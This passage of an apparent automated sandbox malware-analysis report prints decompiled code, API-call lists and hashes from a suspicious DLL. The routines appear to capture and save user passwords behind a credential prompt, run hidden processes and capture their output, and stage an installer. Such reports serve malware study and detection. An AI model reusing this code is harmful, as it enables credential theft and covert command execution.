                                                                                                                        							FormatMessageW(0x12ff, 0, 0x1109, 0,  &(_t199[_t196 + _t140]), 0x926 - _t196 + _t140, 0);
                                                                                                                        							L18:
                                                                                                                        							_v1368 = _t199;
                                                                                                                        							L19:
                                                                                                                        							FreeLibrary(_t154);
                                                                                                                        							goto L20;
                                                                                                                        						}
                                                                                                                        						_t145 = LoadStringW(_t154, 0xab, ??, ??);
                                                                                                                        						if(_t145 > 0) {
                                                                                                                        							_t34 = _t145 * 2; // 0xcb2
                                                                                                                        							_t190[_t145] = 0x20002e;
                                                                                                                        							if(LoadStringW(_t154, 0x91, _t190 + _t34 + 4, 0x80 - _t145) > 0) {
                                                                                                                        								_v1372 = _t190;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if(LoadStringW(_t154, 0xd2, _t199, 0x926) <= 0) {
                                                                                                                        							goto L19;
                                                                                                                        						} else {
                                                                                                                        							goto L18;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F335130: LogonUserW.ADVAPI32(0099B7A8,0099B7A8,6F3396ED,00000002,00000000,0099EC68), ref: 6F335150
                                                                                                                          • Part of subcall function 6F335130: GetLastError.KERNEL32 ref: 6F33515C
                                                                                                                          • Part of subcall function 6F335130: CloseHandle.KERNEL32(?), ref: 6F335177
                                                                                                                        • SwitchDesktop.USER32(00000000,00000000,00000000), ref: 6F33970C
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339718
                                                                                                                        • LoadLibraryA.KERNEL32(credui.dll,00000000,00000000), ref: 6F339723
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000004,FF000000), ref: 6F3397BB
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3397C2
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3397DA
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 6F339814
                                                                                                                        • PathAddBackslashA.SHLWAPI(?), ref: 6F339822
                                                                                                                        • lstrcatA.KERNEL32(?,rstrui.exe), ref: 6F339844
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000020), ref: 6F339855
                                                                                                                        • LoadStringW.USER32(00000000,000000AB,00000CAE,00000080), ref: 6F33987B
                                                                                                                        • LoadStringW.USER32(00000000,00000091,00000CB2,00000080), ref: 6F33989F
                                                                                                                        • LoadStringW.USER32(00000000,000000D2,00000DB0,00000926), ref: 6F3398B9
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000926,00000000,?,?,00000104,?,00000014,74784F20), ref: 6F339952
                                                                                                                        • wsprintfW.USER32 ref: 6F33998A
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399B6
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399CC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399D3
                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000404), ref: 6F339A64
                                                                                                                        • RtlZeroMemory.NTDLL(00000404,00000202), ref: 6F339A7D
                                                                                                                        • RtlZeroMemory.NTDLL(00000606,00000404), ref: 6F339AB3
                                                                                                                        • RtlZeroMemory.NTDLL(00000A0A,000002A4), ref: 6F339AC4
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(PWD,00000000,00000404,0098A4D0), ref: 6F339B0A
                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 6F339B26
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B3C
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B43
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B4B
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B52
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,00000004,FF000000), ref: 6F339B61
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 6F339B77
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F339B84
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339B91
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F339BBE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeLoadMemoryZero$DesktopLibraryProcessString$AllocErrorLastSleepSwitchThread$BackslashCloseDirectoryHandleLogonPathPrivateProfileSystemTaskUserWritelstrcatwsprintf
                                                                                                                        • String ID: $%s\%s$PWD$credui.dll$rstrui.exe$wuaueng.dll
                                                                                                                        • API String ID: 938628543-1540689510
                                                                                                                        • Opcode ID: 12de891eb235b013c2c9a16d6a4c44d2a8890b5ec882c7b90e570de0375a22dc
                                                                                                                        • Instruction ID: fd8a445435fc3b6a829dbbcb351fdb4702dcea6a5c0bca04883be252e6cc30e8
                                                                                                                        • Opcode Fuzzy Hash: 12de891eb235b013c2c9a16d6a4c44d2a8890b5ec882c7b90e570de0375a22dc
                                                                                                                        • Instruction Fuzzy Hash: 60D191B2A04399EFE720DF65CC88F5BBBEDFB89710F00491DFA8596141DB70A4148B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E6F332ED0(intOrPtr* _a12) {
                                                                                                                        				intOrPtr* _v4;
                                                                                                                        				signed int _v8;
                                                                                                                        				CHAR* _v12;
                                                                                                                        				intOrPtr _v16;
                                                                                                                        				struct _STARTUPINFOA _v84;
                                                                                                                        				struct _PROCESS_INFORMATION _v100;
                                                                                                                        				void* _v108;
                                                                                                                        				void* _v112;
                                                                                                                        				CHAR* _v116;
                                                                                                                        				void* _v120;
                                                                                                                        				void* _v124;
                                                                                                                        				void* _v128;
                                                                                                                        				intOrPtr _v132;
                                                                                                                        				long _v136;
                                                                                                                        				CHAR* _t52;
                                                                                                                        				int _t54;
                                                                                                                        				long _t69;
                                                                                                                        				intOrPtr _t82;
                                                                                                                        				long _t85;
                                                                                                                        				void* _t90;
                                                                                                                        				struct _OVERLAPPED* _t110;
                                                                                                                        				void* _t111;
                                                                                                                        				int _t112;
                                                                                                                        				int _t116;
                                                                                                                        				void* _t121;
                                                                                                                        
                                                                                                                        				_t110 = 0;
                                                                                                                        				_v116 = 0;
                                                                                                                        				_t90 = 0;
                                                                                                                        				_v100.hThread.nLength = 0xc;
                                                                                                                        				_v100.dwProcessId = 0;
                                                                                                                        				_v100.dwThreadId = 1;
                                                                                                                        				_v112 = 0;
                                                                                                                        				_v108 = 0;
                                                                                                                        				if(CreatePipe( &_v112,  &_v108,  &(_v100.hThread), 0) == 0) {
                                                                                                                        					 *_a12 = 0;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_push(0x44);
                                                                                                                        					_push( &(_v84.dwX));
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_t52 = _v116;
                                                                                                                        					_push(0x10);
                                                                                                                        					_push( &(_v100.dwProcessId));
                                                                                                                        					_v84.lpDesktop = 0x44;
                                                                                                                        					_v84.lpReserved2 = 0x101;
                                                                                                                        					_v12 = _t52;
                                                                                                                        					_v16 = _t52;
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_t54 = CreateProcessA(0, _v12, 0, 0, 1, 0x8000000, 0, 0,  &_v84,  &_v100);
                                                                                                                        					CloseHandle(_v124);
                                                                                                                        					if(_t54 != 0) {
                                                                                                                        						_t111 = HeapAlloc(GetProcessHeap(), 8, 0x401);
                                                                                                                        						_v120 = _t111;
                                                                                                                        						if(_t111 != 0) {
                                                                                                                        							_v116 = GetTickCount() + _v8 * 0x3e8;
                                                                                                                        							_v136 = 0;
                                                                                                                        							if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
                                                                                                                        								while(1) {
                                                                                                                        									_t69 = _v136;
                                                                                                                        									if(_t69 == 0) {
                                                                                                                        										goto L23;
                                                                                                                        									}
                                                                                                                        									 *((char*)(_t69 + _t111)) = 0;
                                                                                                                        									_t116 = MultiByteToWideChar(1, 0, _t111, _v136, 0, 0);
                                                                                                                        									if(_t116 != 0) {
                                                                                                                        										_t31 = _t116 + 2; // 0x2
                                                                                                                        										_t121 = HeapAlloc(GetProcessHeap(), 8, _t116 + _t31);
                                                                                                                        										if(_t121 != 0) {
                                                                                                                        											if(MultiByteToWideChar(1, 0, _t111, _v136, _t121, _t116) != 0) {
                                                                                                                        												_t112 = WideCharToMultiByte(0xfde9, 0, _t121, _t116, 0, 0, 0, 0);
                                                                                                                        												if(_t112 != 0) {
                                                                                                                        													_t82 = _v132 + _t112;
                                                                                                                        													_v132 = _t82;
                                                                                                                        													_push(_t82 + 1);
                                                                                                                        													if(_t90 != 0) {
                                                                                                                        														_t85 = HeapReAlloc(GetProcessHeap(), 0, _t90, ??);
                                                                                                                        														if(_t85 != 0) {
                                                                                                                        															goto L12;
                                                                                                                        														} else {
                                                                                                                        															HeapFree(GetProcessHeap(), _t85, _t90);
                                                                                                                        															_t90 = 0;
                                                                                                                        															goto L14;
                                                                                                                        														}
                                                                                                                        														goto L24;
                                                                                                                        													} else {
                                                                                                                        														_t85 = HeapAlloc(GetProcessHeap(), 8, ??);
                                                                                                                        														L12:
                                                                                                                        														_t90 = _t85;
                                                                                                                        														if(_t90 != 0) {
                                                                                                                        															WideCharToMultiByte(0xfde9, 0, _t121, _t116, _t90 - _t112 + _v132, _t112, 0, 0);
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												L14:
                                                                                                                        												_t111 = _v120;
                                                                                                                        											}
                                                                                                                        											HeapFree(GetProcessHeap(), 0, _t121);
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									if(GetTickCount() >= _v116 || _t90 == 0) {
                                                                                                                        										_push(0);
                                                                                                                        										_push(_v100.hProcess);
                                                                                                                        										L6F33C30C();
                                                                                                                        									} else {
                                                                                                                        										if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
                                                                                                                        											continue;
                                                                                                                        										} else {
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									goto L23;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							L23:
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t111);
                                                                                                                        						}
                                                                                                                        						L24:
                                                                                                                        						CloseHandle(_v100.hThread);
                                                                                                                        						CloseHandle(_v100);
                                                                                                                        						_t110 = _v132;
                                                                                                                        					}
                                                                                                                        					CloseHandle(_v128);
                                                                                                                        					 *_v4 = _t110;
                                                                                                                        					return _t90;
                                                                                                                        				}
                                                                                                                        			}




























                                                                                                                        0x6f333075
                                                                                                                        0x6f33307a
                                                                                                                        0x6f33307d
                                                                                                                        0x6f333101
                                                                                                                        0x6f333109
                                                                                                                        0x00000000
                                                                                                                        0x6f33310b
                                                                                                                        0x6f333114
                                                                                                                        0x6f33311a
                                                                                                                        0x00000000
                                                                                                                        0x6f33311a
                                                                                                                        0x00000000
                                                                                                                        0x6f33307f
                                                                                                                        0x6f333088
                                                                                                                        0x6f33308e
                                                                                                                        0x6f33308e
                                                                                                                        0x6f333092
                                                                                                                        0x6f3330ab
                                                                                                                        0x6f3330ab
                                                                                                                        0x6f333092
                                                                                                                        0x6f33307d
                                                                                                                        0x6f3330b1
                                                                                                                        0x6f3330b1
                                                                                                                        0x6f3330b1
                                                                                                                        0x6f3330bf
                                                                                                                        0x6f3330bf
                                                                                                                        0x6f333036
                                                                                                                        0x6f3330cf
                                                                                                                        0x6f333122
                                                                                                                        0x6f333124
                                                                                                                        0x6f333125
                                                                                                                        0x6f3330d5
                                                                                                                        0x6f3330ef
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3330f5
                                                                                                                        0x6f3330ef
                                                                                                                        0x00000000
                                                                                                                        0x6f3330cf
                                                                                                                        0x6f332ff0
                                                                                                                        0x6f33312a
                                                                                                                        0x6f333134
                                                                                                                        0x6f33313a
                                                                                                                        0x6f333140
                                                                                                                        0x6f333145
                                                                                                                        0x6f33314c
                                                                                                                        0x6f33314e
                                                                                                                        0x6f33314e
                                                                                                                        0x6f333157
                                                                                                                        0x6f333162
                                                                                                                        0x6f33316b
                                                                                                                        0x6f33316b

                                                                                                                        APIs
                                                                                                                        • CreatePipe.KERNEL32 ref: 6F332F09
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F332F20
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F332F4E
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?,?), ref: 6F332F71
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F332F84
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000401,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F332F95
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F332F9C
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F332FB0
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6F332FDE
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6F33300E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333025
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33302C
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6F333048
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F333063
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333081
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333088
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6F3330AB
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F3330B8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F3330BF
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3330C5
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6F3330E7
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?), ref: 6F3330FA
                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333101
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33310D
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333114
                                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 6F333125
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33312D
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333134
                                                                                                                        • CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333145
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33314C
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333157
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocByteCharCloseHandleMultiWide$Free$CountCreateFileMemoryReadTickZero$PipeTerminate
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1574224466-2746444292
                                                                                                                        • Opcode ID: 3b637f1cb17450afd01af3a6585aca2d6a4881f01100fb07a57f387ddcb12d4d
                                                                                                                        • Instruction ID: c56d1d7cf3803eb3caa04411d334526c855fb94d2ac1a9ef05d1e66a5cf51e63
                                                                                                                        • Opcode Fuzzy Hash: 3b637f1cb17450afd01af3a6585aca2d6a4881f01100fb07a57f387ddcb12d4d
                                                                                                                        • Instruction Fuzzy Hash: 65718C72A44385ABE720DFA5CC49F5BBBEDFBC9B10F00491DB645D7280DAB0E4148B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E6F3344D0(void* __ebx, void* __edi) {
                                                                                                                        				CHAR* _t35;
                                                                                                                        				int _t36;
                                                                                                                        				char _t40;
                                                                                                                        				void* _t42;
                                                                                                                        				int _t46;
                                                                                                                        				CHAR* _t47;
                                                                                                                        				void* _t50;
                                                                                                                        				void* _t55;
                                                                                                                        				CHAR* _t57;
                                                                                                                        				void* _t64;
                                                                                                                        				void* _t65;
                                                                                                                        				void* _t66;
                                                                                                                        				CHAR* _t67;
                                                                                                                        				CHAR* _t69;
                                                                                                                        				signed int _t70;
                                                                                                                        				signed int _t74;
                                                                                                                        				CHAR* _t78;
                                                                                                                        				void* _t79;
                                                                                                                        				CHAR* _t82;
                                                                                                                        				char _t83;
                                                                                                                        				void* _t84;
                                                                                                                        				CHAR* _t86;
                                                                                                                        				void* _t87;
                                                                                                                        				void* _t88;
                                                                                                                        				void* _t89;
                                                                                                                        				intOrPtr _t92;
                                                                                                                        				intOrPtr _t93;
                                                                                                                        				CHAR* _t94;
                                                                                                                        				void* _t96;
                                                                                                                        				void* _t98;
                                                                                                                        				void* _t99;
                                                                                                                        				void* _t100;
                                                                                                                        
                                                                                                                        				_t89 = __edi;
                                                                                                                        				_t66 = __ebx;
                                                                                                                        				 *(_t98 + 0xc) = 0;
                                                                                                                        				if(M6F340544 == 0) {
                                                                                                                        					L23:
                                                                                                                        					return  *(_t98 + 0xc);
                                                                                                                        				} else {
                                                                                                                        					_t35 = M6F3404CC; // 0x99d818
                                                                                                                        					_t69 = M6F3404D8; // 0x99b240
                                                                                                                        					_t82 = M6F3404DC; // 0x99b1c8
                                                                                                                        					_t36 = GetPrivateProfileIntA(_t82, _t69, 0, _t35);
                                                                                                                        					_t93 =  *((intOrPtr*)(_t98 + 0x38));
                                                                                                                        					if(_t93 != 0 || _t36 != 0) {
                                                                                                                        						if( *((intOrPtr*)(_t98 + 0x3c)) != 0) {
                                                                                                                        							goto L7;
                                                                                                                        						} else {
                                                                                                                        							_t64 = M6F3404D8; // 0x99b240
                                                                                                                        							_t65 = E6F3338A0(_t64, 0, 0, 1);
                                                                                                                        							_t98 = _t98 + 0x10;
                                                                                                                        							if(_t65 == (0 | _t93 == 0x00000000)) {
                                                                                                                        								goto L7;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L23;
                                                                                                                        					} else {
                                                                                                                        						if( *((intOrPtr*)(_t98 + 0x3c)) != _t36) {
                                                                                                                        							L7:
                                                                                                                        							_t96 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        							if(_t96 != 0) {
                                                                                                                        								_t83 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        								_push(_t66);
                                                                                                                        								_push(_t89);
                                                                                                                        								wsprintfA(_t96, "%s%s%s", _t83, "vpn", ".cab");
                                                                                                                        								_t40 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        								_t7 = _t96 + 0x201; // 0x201
                                                                                                                        								_t67 = _t7;
                                                                                                                        								 *((intOrPtr*)(_t98 + 0x50)) = wsprintfA(_t67, "%s%s%c", _t40, "vpn", 0x5c);
                                                                                                                        								_t42 = E6F332DC0(_t96, _t67, 0);
                                                                                                                        								_t98 = _t98 + 0x34;
                                                                                                                        								if(_t42 != 0) {
                                                                                                                        									_t70 = M6F3404EC; // 0x1
                                                                                                                        									asm("sbb ecx, ecx");
                                                                                                                        									wsprintfA(_t96, "%s%d%c", _t67, ( ~_t70 & 0xffffffea) + 0x56, 0x5c);
                                                                                                                        									_t9 =  &(_t67[0x401]); // 0x602
                                                                                                                        									_t94 = _t9;
                                                                                                                        									_t46 = wsprintfA(_t94, "%s%s%s", _t96, "install", ".exe");
                                                                                                                        									_t99 = _t98 + 0x28;
                                                                                                                        									_t47 =  &(( &(_t94[1]))[_t46]);
                                                                                                                        									 *(_t99 + 0x10) = _t47;
                                                                                                                        									if( *((intOrPtr*)(_t99 + 0x44)) == 0) {
                                                                                                                        										_t84 = M6F3404D8; // 0x99b240
                                                                                                                        										wsprintfA(_t47, "%s %s", "remove", _t84);
                                                                                                                        										_t100 = _t99 + 0x10;
                                                                                                                        									} else {
                                                                                                                        										_t79 = M6F3404D8; // 0x99b240
                                                                                                                        										wsprintfA(_t47, "%s \"%s%s%s\" %s", "install", _t96, _t79, ".inf", _t79);
                                                                                                                        										_t100 = _t99 + 0x1c;
                                                                                                                        									}
                                                                                                                        									_t74 =  *(_t100 + 0x10);
                                                                                                                        									_push(_t100 + 0x14);
                                                                                                                        									_push(0x1e);
                                                                                                                        									_push(0);
                                                                                                                        									 *(_t100 + 0x2c) = 0;
                                                                                                                        									_t50 = E6F334230(0, _t94, _t74);
                                                                                                                        									_t98 = _t100 + 0x18;
                                                                                                                        									if(_t50 != 0) {
                                                                                                                        										if(E6F334300() != 0) {
                                                                                                                        											_t88 = M6F3404D8; // 0x99b240
                                                                                                                        											wsprintfA( *(_t98 + 0x10), "%s %s", "restart", _t88);
                                                                                                                        											_t74 =  *(_t98 + 0x20);
                                                                                                                        											_push(0);
                                                                                                                        											_push(0x1e);
                                                                                                                        											_push(0);
                                                                                                                        											E6F334230(0, _t94, _t74);
                                                                                                                        											_t98 = _t98 + 0x28;
                                                                                                                        										}
                                                                                                                        										_t92 =  *((intOrPtr*)(_t98 + 0x44));
                                                                                                                        										if(_t92 == 0) {
                                                                                                                        											_t55 = M6F3404D8; // 0x99b240
                                                                                                                        											E6F333700(_t55, 1);
                                                                                                                        											_t98 = _t98 + 8;
                                                                                                                        										} else {
                                                                                                                        											_t87 = M6F3404D8; // 0x99b240
                                                                                                                        											E6F3338A0(_t87, 0, 0, 0);
                                                                                                                        											_t98 = _t98 + 0x10;
                                                                                                                        										}
                                                                                                                        										if( *((intOrPtr*)(_t98 + 0x14)) == 0) {
                                                                                                                        											 *_t94 = (_t74 & 0xffffff00 | _t92 != 0x00000000) + 0x30;
                                                                                                                        											_t94[1] = 0;
                                                                                                                        											_t86 = M6F3404CC; // 0x99d818
                                                                                                                        											_t57 = M6F3404D8; // 0x99b240
                                                                                                                        											_t78 = M6F3404DC; // 0x99b1c8
                                                                                                                        											WritePrivateProfileStringA(_t78, _t57, _t94, _t86);
                                                                                                                        											 *((intOrPtr*)(_t98 + 0x18)) = 1;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									_push(0x1e);
                                                                                                                        									_push(_t98 + 0x24);
                                                                                                                        									 *((short*)( *((intOrPtr*)(_t98 + 0x1c)) + _t67 - 1)) = 0;
                                                                                                                        									L6F33C2EE();
                                                                                                                        									 *((intOrPtr*)(_t98 + 0x28)) = 3;
                                                                                                                        									 *(_t98 + 0x2c) = _t67;
                                                                                                                        									 *((short*)(_t98 + 0x34)) = 0x614;
                                                                                                                        									SHFileOperationA(_t98 + 0x20);
                                                                                                                        								}
                                                                                                                        								HeapFree(GetProcessHeap(), 0, _t96);
                                                                                                                        							}
                                                                                                                        							goto L23;
                                                                                                                        						} else {
                                                                                                                        							return _t36;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}




































                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F3344FF
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F33454E
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334555
                                                                                                                        • wsprintfA.USER32 ref: 6F334584
                                                                                                                        • wsprintfA.USER32 ref: 6F33459F
                                                                                                                        • wsprintfA.USER32 ref: 6F3345D3
                                                                                                                        • wsprintfA.USER32 ref: 6F3345EC
                                                                                                                        • wsprintfA.USER32 ref: 6F334619
                                                                                                                        • wsprintfA.USER32 ref: 6F334632
                                                                                                                        • wsprintfA.USER32 ref: 6F33467F
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,0099B240,00000602,0099D818), ref: 6F3346F0
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000001E), ref: 6F334710
                                                                                                                        • SHFileOperationA.SHELL32 ref: 6F334730
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334739
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334740
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$Heap$PrivateProcessProfile$AllocFileFreeMemoryOperationStringWriteZero
